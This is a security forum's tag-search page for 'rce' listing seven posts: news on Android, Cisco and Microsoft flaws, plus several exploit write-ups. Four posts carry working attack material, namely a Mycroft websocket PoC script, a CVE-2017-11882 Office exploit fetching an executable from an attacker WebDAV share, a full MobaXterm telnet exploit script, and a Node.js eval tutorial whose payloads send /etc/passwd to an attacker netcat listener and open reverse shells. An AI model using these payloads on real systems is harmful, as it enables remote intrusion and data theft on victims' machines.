Jump to content

Search the Community

Showing results for tags 'rce'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Fake News Romania
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 7 results

  1. The vulnerability is one of 39 affecting various aspects of the mobile OS that the company fixed in a security update this week. Google has patched a vulnerability in its Android OS that could allow attackers to completely take over someone’s device to install programs, steal or change data, or create new accounts with full privileges. The flaw (CVE-2020-0103) was one of 39 vulnerabilities affecting Android OS builds that use older security profiles and are spread throughout various components of Android that the company fixed in its latest security patch, according to a security bulletin published Monday. The vulnerabilities pose a high risk for consumers as well as business and government institution users, the company said. However, the most critical of these—found in the System component of Android–could allow for remote code execution (RCE), depending on the existing privileges on the device, according to Google. However, the potential for exploitation depends on the privilege status of an application, according to the Center for Internet Security’s (CIS’s) advisory on the flaw. These vulnerabilities could be exploited through multiple methods such as email, web browsing and multimedia services (MMS) when processing media files, CIS explained in its post. However, so far none of the vulnerabilities patched in the update have been exploited in the wild, according to CIS. The critical flaw was one of eight that Google patched for the System component of Android. The rest of the flaws were rated high-severity, except for one, which was rated moderate. Google also patched a critical flaw in Android’s Framework component, CVE-2020-0096, that could enable a local attacker to execute arbitrary code within the context of a privileged process, the company said. The vulnerability was one of three patched in this component, the other two of which had a severity rating of high. The only other critical vulnerability patched was a critical security vulnerability, CVE-2020-3641, found in the Qualcomm closed-source components. The flaw was one of 10 patched in these components, the rest of which were rated as high severity. The security update also fixes four high-severity vulnerabilities in Android’s Media framework; eight high-severity vulnerabilities in Qualcomm components; four high-severity flaws in MediaTek components; and two high-severity vulnerabilities in Android Kernel components. While the Android security platform and service protections such as Google Play Protect “reduce the likelihood that security vulnerabilities could be successfully exploited on Android,” Google recommended that Android users install the latest security patch just to be on the safe side. Indeed, Google has historically struggled with the spread of malware via Android apps being downloaded from the Google Play store and has made a concerted effort in the last year and a half to try to stay on top of it. Still, malware on the platform persists. Just last week researchers discovered a new Android mobile malware called EventBot that steals payment data from users of popular financial apps like PayPal, Barclays, CapitalOne and more. Inbox security is your best defense against today’s fastest growing security threat – phishing and Business Email Compromise attacks. On May 13 at 2 p.m. ET, join Valimail security experts and Threatpost for a FREE webinar, 5 Proven Strategies to Prevent Email Compromise. Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please register here for this sponsored webinar. Also, don’t miss our latest on-demand webinar from DivvyCloud and Threatpost, A Practical Guide to Securing the Cloud in the Face of Crisis, with critical, advanced takeaways on how to avoid cloud disruption and chaos. Via threatpost.com
  2. Cisco has released security updates to fix multiple vulnerabilities in various products, including two remote code execution flaws in Webex Player. The two remote code execution vulnerabilities fixed by Cisco have been tracked CVE-2020-3127 and CVE-2020-3128 respectively. The vulnerabilities have been rated as high severity and received a CVSS score of 7.8. The vulnerabilities are caused by the insufficient validation of elements within a Webex recording stored as ARF (Advanced Recording Format) or WRF (Webex Recording Format). A remote attacker could exploit the vulnerabilities by sending malicious ARF/WRF files and tricking the victim into opening them. The flaw could trigger the execution of arbitrary code with the privileges of the current user. The flaws affect Webex Meetings (Webex Network Recording Player and Webex Player versions prior to WBS 39.5.17 or WBS 39.11.0), Webex Meetings Online (Webex Network Recording Player and Webex Player releases earlier than 1.3.49), and Webex Meetings Server (Webex Network Recording Player releases earlier than 3.0MR3SecurityPatch1 and 4.0MR2SecurityPatch2). Cisco confirmed that it is not aware of attacks in the wild exploiting the flaws. The tech giant also released security updated for another two high severity vulnerabilities, a Cisco Intelligent Proximity SSL Certificate Validation flaw (CVE-2020-3155) and a Cross-Site Request Forgery Vulnerability in Cisco Prime Network Registrar (CVE-2020-3148). The CVE-2020-3155 flaw could be remotely exploited to view or alter information shared on Webex video devices and Cisco collaboration endpoints. The flaw is caused by the lack of validation of the SSL server certificate received when connecting to a Webex video device or a Cisco collaboration endpoint. In this scenario, an attacker could carry out a man in the middle (MITM). The CVE-2020-3148 flaw impacts the web-based interface of Prime Network Registrar (CPNR) and could be exploited by a remote, unauthenticated attacker to launch a cross-site request forgery (CSRF) attack. Cisco also fixed nine medium severity flaws that could lead to information disclosure, command execution, denial of service, cross-site scripting (XSS), or resource exhaustion. The flaws impact Webex Meetings Client for MacOS, TelePresence Management Suite, Remote PHY Device Software, Prime Collaboration Provisioning, Identity Services Engine (ISE), IOS XR Software, AsyncOS Software for Email Security Appliances (ESAs), and ESA, Web Security Appliance (WSA), and Content Security Management Appliance (SMA). The full list of addressed issued is available here. Via
  3. A flaw in the implementation of Microsoft's Troubleshooter technology could lead to remote code execution if a crafted .diagcab file is opened by the victim. The exploit leverages a rogue webdav server to trick MSDT to drop files to attacker controller locations on the file system. Source
  4. "Hey Mycroft, we've got a Problem" Getting "Zero Click" Remote Code Execution in Mycroft AI vocal assistant Introduction During my journey contributing to open source I was working with my friend Matteo De Carlo on an AUR Package of a really interesting project called Mycroft AI. It's an AI-powered vocal assistant started with a crowdfunding campaign in 2015 and a more recent one that allowed Mycroft to produce their Mark-I and Mark-II devices. It's also running on Linux Desktop/Server, Raspberry PI and will be available soon™ on Jaguar Type-F and Land Rover Digging in the source code While looking at the source code I found an interesting point: here ... host = config.get("host") port = config.get("port") route = config.get("route") validate_param(host, "websocket.host") validate_param(port, "websocket.port") validate_param(route, "websocket.route") routes = [ (route, WebsocketEventHandler) ] application = web.Application(routes, **settings) application.listen(port, host) ioloop.IOLoop.instance().start() ... So there is a websocket server that doesn't require authentication that by default is exposed on 0.0.0.0:8181/core. Let's test it #!/usr/bin/env python import asyncio import websockets uri = "ws://myserver:8181/core" command = "say pwned" async def sendPayload(): async with websockets.connect(uri) as websocket: await websocket.send("{\"data\": {\"utterances\": [\""+command+"\"]}, \"type\": \"recognizer_loop:utterance\", \"context\": null}") asyncio.get_event_loop().run_until_complete(sendPayload()) And magically we have an answer from the vocal assistant saying pwned! Well, now we can have Mycroft pronounce stuff remotely, but this is not a really big finding unless you want to scare your friends, right? The skills system Digging deeper we can see that Mycroft has a skills system and a default skill that can install others skills (pretty neat, right?) How is a skill composed? From what we can see from the documentation a default skill is composed by: dialog/en-us/command.dialog contains the vocal command that will trigger the skill vocab/en-us/answer.voc contains the answer that Mycroft will pronounce requirements.txt contains the requirements for the skill that will be installed with pip __int__.py contains the main function of the skill and will be loaded when the skill is triggered What can I do? I could create a malicious skill that when triggered runs arbitrary code on the remote machine, but unfortunately this is not possible via vocal command unless the URL of the skill is not whitelisted via the online website. So this is possible but will be a little tricky. So I'm done? Not yet. I found out that I can trigger skills remotely and that is possible to execute commands on a remote machine convincing the user to install a malicious skill. I may have enough to submit a vulnerability report. But maybe I can do a bit better... Getting a remote shell using default skills We know that Mycroft has some default skills like open that will open an application and others that are whitelisted but not installed. Reading through to the list, I found a really interesting skill called skill-autogui, whose description says Manipulate your mouse and keyboard with Mycroft. We got it! Let's try to combine everything we found so far into a PoC: #!/usr/bin/env python import sys import asyncio import websockets import time cmds = ["mute audio"] + sys.argv[1:] uri = "ws://myserver:8181/core" async def sendPayload(): for payload in cmds: async with websockets.connect(uri) as websocket: await websocket.send("{\"data\": {\"utterances\": [\""+payload+"\"]}, \"type\": \"recognizer_loop:utterance\", \"context\": null}") time.sleep(1) asyncio.get_event_loop().run_until_complete(sendPayload()) Running the exploit with python pwn.py "install autogui" "open xterm" "type echo pwned" "press enter" allowed me to finally get a command execution on a Linux machine. Notes open xterm was needed because my test Linux environment had a DE installed, on a remote server the commands will be executed directly on TTY so this step is not nesessary. The skill branching had a big change and now some skills are not (yet) available (autogui is one of them) but this is not the real point. Mycroft has skills to interact with domotic houses and other services that can still be manipulated (the lack of imagination is the limit here). The vulnerability lies in the lack of authentication for the ws. Affected devices All the devices running Mycroft <= ? with the websocket server exposed (Mark-I has the websocket behind a firewall by default) Interested in my work? Follow me on: Twitter: @0x7a657461 Linkedin: https://linkedin.com/in/0xzeta GitHub: https://github.com/Nhoya Timeline 08/03/2018 Vulnerability found 09/03/2018 Vulnerability reported 13/03/2018 The CTO answered that they are aware of this problem and are currently working on a patch 06/06/2018 The CTO said that they have no problem with the release of the vulnerability and will add a warning to remember the user to use a firewall ¯\_(ツ)_/¯ 09/06/2018 Public disclosure Source
  5. Microsoft Office - OLE Remote Code Execution Exploit CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882 Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html DEMO PoC exploitation: webdav_exec CVE-2017-11882 A simple PoC for CVE-2017-11882. This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server. The reason why this approach might be handy is a limitation of executed command length. However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine. This script creates simple document with several OLE objects. These objects exploits CVE-2017-11882, which results in sequential command execution. The first command which triggers WebClient service start may look like this: cmd.exe /c start \\attacker_ip\ff Attacker controlled binary path should be a UNC network path: \\attacker_ip\ff\1.exe Usage webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name Sample exploit for CVE-2017-11882 (starting calc.exe as payload) example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system. Download: CVE-2017-11882-master.zip or git clone https://github.com/embedi/CVE-2017-11882.git Mirror: webdav_exec_CVE-2017-11882.py Source
  6. Author: sultan albalawi | Category: remote exploits | Platform: windows Date add: 12-09-2017 | Risk: [Security Risk Critical] | 0day-ID: 0day-ID-28494 import telnetlib,sys # Exploit Title: MobaXtrem 10.4 Remote Code Execution # Date: 11/9/2017 # Exploit Author: Sultan Albalawi # Vendor Homepage: http://mobatek.net # Software Link: http://download.mobatek.net/10420170816103227/MobaXterm_Portable_v10.4.zip # Version: 10.4 # Tested on: Windows Xp & Windows 7 & 10 # POC : https://www.youtube.com/watch?v=oYdzP0umtFA&feature=youtu.be # Vulnerability Cause::: # Telnet service doesn't authinticate for remote conncection which allows attacker to # pass malicious commands over victim box through protocol. print "\x27\x27\x27\x0d\x0a\x20\x20\x20\x20\x20" \ "\x20\x20\x5c\x20\x20\x20\x2d\x20\x20\x2d\x20" \ "\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e" \ "\x20\x20\x2d\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d" \ "\x20\x2d\x20\x20\x2d\x20\x2d\x20\x20\x2d\x20" \ "\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a" \ "\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c" \ "\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74" \ "\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a" \ "\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a" \ "\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20" \ "\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20" \ "\x60\x2e\x20\x20\x20\x20\x2c\x3b\x27\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70" \ "\x50\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a" \ "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x58\x20" \ "\x2f\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20" \ "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" \ "\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20" \ "\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f" \ "\x60\x20\x60\x20\x28\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c" \ "\x0d\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x20" \ "\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x64" \ "\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20\x20" \ "\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74" \ "\x79\x60\x20\x20\x27\x20\x30\x20\x20\x30\x20" \ "\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a" \ "\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20" \ "\x20\x20\x20\x20\x7c\x0d\x0a\x20\x20\x20\x20" \ "\x2c\x20\x20\x20\x20\x20\x20\x20\x2c\x20\x20" \ "\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a" \ "\x2a\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20" \ "\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20" \ "\x20\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20" \ "\x20\x60\x2e\x5f\x2e\x27\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d" \ "\x5e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60\x20" \ "\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d" \ "\x2d\x2c\x2e\x2e\x5f\x3b\x2d\x2d\x2d\x3e\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20" \ "\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f" \ "\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a" \ "\x20\x20\x27\x20\x60\x20\x20\x20\x20\x2c\x20" \ "\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x5e\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65" \ "\x77\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20" \ "\x20\x20\x60\x2e\x5f\x20\x2c\x20\x20\x27\x20" \ "\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x7c\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x7c" \ "\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x3b\x20\x2c\x27\x27\x2d\x2c\x3b\x27\x20\x60" \ "\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f" \ "\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x60\x60" \ "\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d\x2d\x60\x20" \ "\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20" \ "\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x5e\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x27\x2e\x20\x5f\x2d\x2d\x2d" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f" \ "\x5f\x5f\x20\x7c\x5f\x20\x20\x49\x50\x53\x20" \ "\x20\x20\x20\x20\x29\x0d\x0a\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20" \ "\x20\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d" \ "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x53\x75\x6c\x74\x61\x6e\x20" \ "\x41\x6c\x62\x61\x6c\x61\x77\x69\x0d\x0a\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x68\x74\x74\x70\x73" \ "\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65" \ "\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65" \ "\x6e\x74\x65\x73\x74\x33\x0d\x0a\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61" \ "\x6c\x62\x61\x6c\x61\x77\x69\x34\x70\x65\x6e" \ "\x74\x65\x73\x74\x40\x67\x6d\x61\x69\x6c\x2e" \ "\x63\x6f\x6d\x0d\x0a\x20\x20\x20\x20\x20\x20" \ "\x20\x20\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \ "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d" \ "\x0a\x27\x27\x27" def get_set(HOST,cmd): try : tn = telnetlib.Telnet(HOST) bg="\x63\x79\x67\x73\x74\x61\x72\x74" tn.write(bg+" ./"+cmd+"\n") tn.write(main()) tn.read_all() except KeyboardInterrupt: print "[-] Execution stopped ... keyboard interrupt raised" except Exception as e: pass def main(): if len(sys.argv)==2: HOST = sys.argv[1] cmd = str(raw_input("cmd> ")) if "exit" in cmd : sys.exit("exiting...") else: print"Executing => %s"%cmd get_set(HOST,cmd) else: print "Usage: ./"+sys.argv[0]+" <target_ip>" if __name__ == '__main__': main() # 0day.today [2017-09-12] # Source: http://0day.today/exploit/28494
  7. NODEJS RCE AND A SIMPLE REVERSE SHELL While reading through the blog post on a RCE on demo.paypal.com by @artsploit, I started to wonder what would be the simplest nodejs app that I could use to demo a RCE. Looking at the hello world tutorials online, I came up with the following simple app that takes a user input via the URL as a GET parameter and passes it to eval, which is obviously a bad programming practice. Obviously, the functionality of this app is questionable, but in the real world Node applications will use eval to leverage JavaScript’s eval but with sandboxing amongst other things. var express = require('express'); var app = express(); app.get('/', function (req, res) { res.send('Hello eval(req.query.q)); console.log(req.query.q); }); app.listen(8080, function () { console.log('Example listening on port 8080!'); }); To access the app, navigate to http://hostip:8080/?q='Test'. The exploit can be triggered using the q parameter. Node provides the child_process module and the eval can be used to execute the exploit. A quick demo can consist of the following steps: 1. Run nc -lvp 80 on a server you control and whose port 80 is reachable from the server running the Node app. 2. Navigate to http://hostip:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80') This will send the contents of /etc/passwd to the attacker’s nc instance. If the Node server has the traditional nc installed (instead of the openbsd alternative) you can even use -e /bin/bash to return a proper shell from the Node server. But as the case is with default installations the netcat that attacker’s love may not always be present on vulnerable machines. In such cases, the net module can be used to redirect the stdin, stdout and stderr streams to and from the attacker’s machine. The exploit code in such a case would be: var net = require("net"), sh = require("child_process").exec("/bin/bash"); var client = new net.Socket(); client.connect(80, "attackerip", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); To execute this, use the following steps: 1. Run nc -lvp 80 on a server you control and whose port 80 is reachable from the server running the Node app. Again, this would act as your shell listener/collector. 2. Navigate to http://hostip:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);}); You can then use /bin/bash -i or python -c 'import pty; pty.spawn("/bin/bash")' to get a proper TTY shell (See more techniques here.). I created a docker image with Node and the app installed so that this is easier to test and play with. You can setup this PoC using the following steps: 1. Install docker on your host machine. This is the standard reference – https://docs.docker.com/engine/installation/ 2. Once docker is setup, run the following command: docker run -p 8080:8080 -d appsecco/node-simple-rce 3. Navigate to the Node app by going to: http://localhost:8080/?q=’Test’ Update: A simpler reverse shell is: require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/192.168.56.2/80 0>%261"') According to https://github.com/bahamas10/node-exec: For backwards compatibility with child_process.exec, it is also possible to pass a string to exec. The string will automatically be converted to [‘/bin/sh’, ‘-c’, ‘{string}’], which will cause the string to be parsed on the shell. Since /bin/sh has some trouble dealing with multiple file descriptors, we can simply ask /bin/sh to spawn a new /bin/bash and use the new /bin/bash to execute our standard reverse shellcode. Whew! The code is available on Github if you want to test this locally. Feel free to make any changes to the code and redistribute! Happy Hacking! Articol preluat de pe site-ul Mi s-a parut foarte interesant acest write-up , si m-am gandit sa il postez si aici. Sper sa va inspire !
×
×
  • Create New...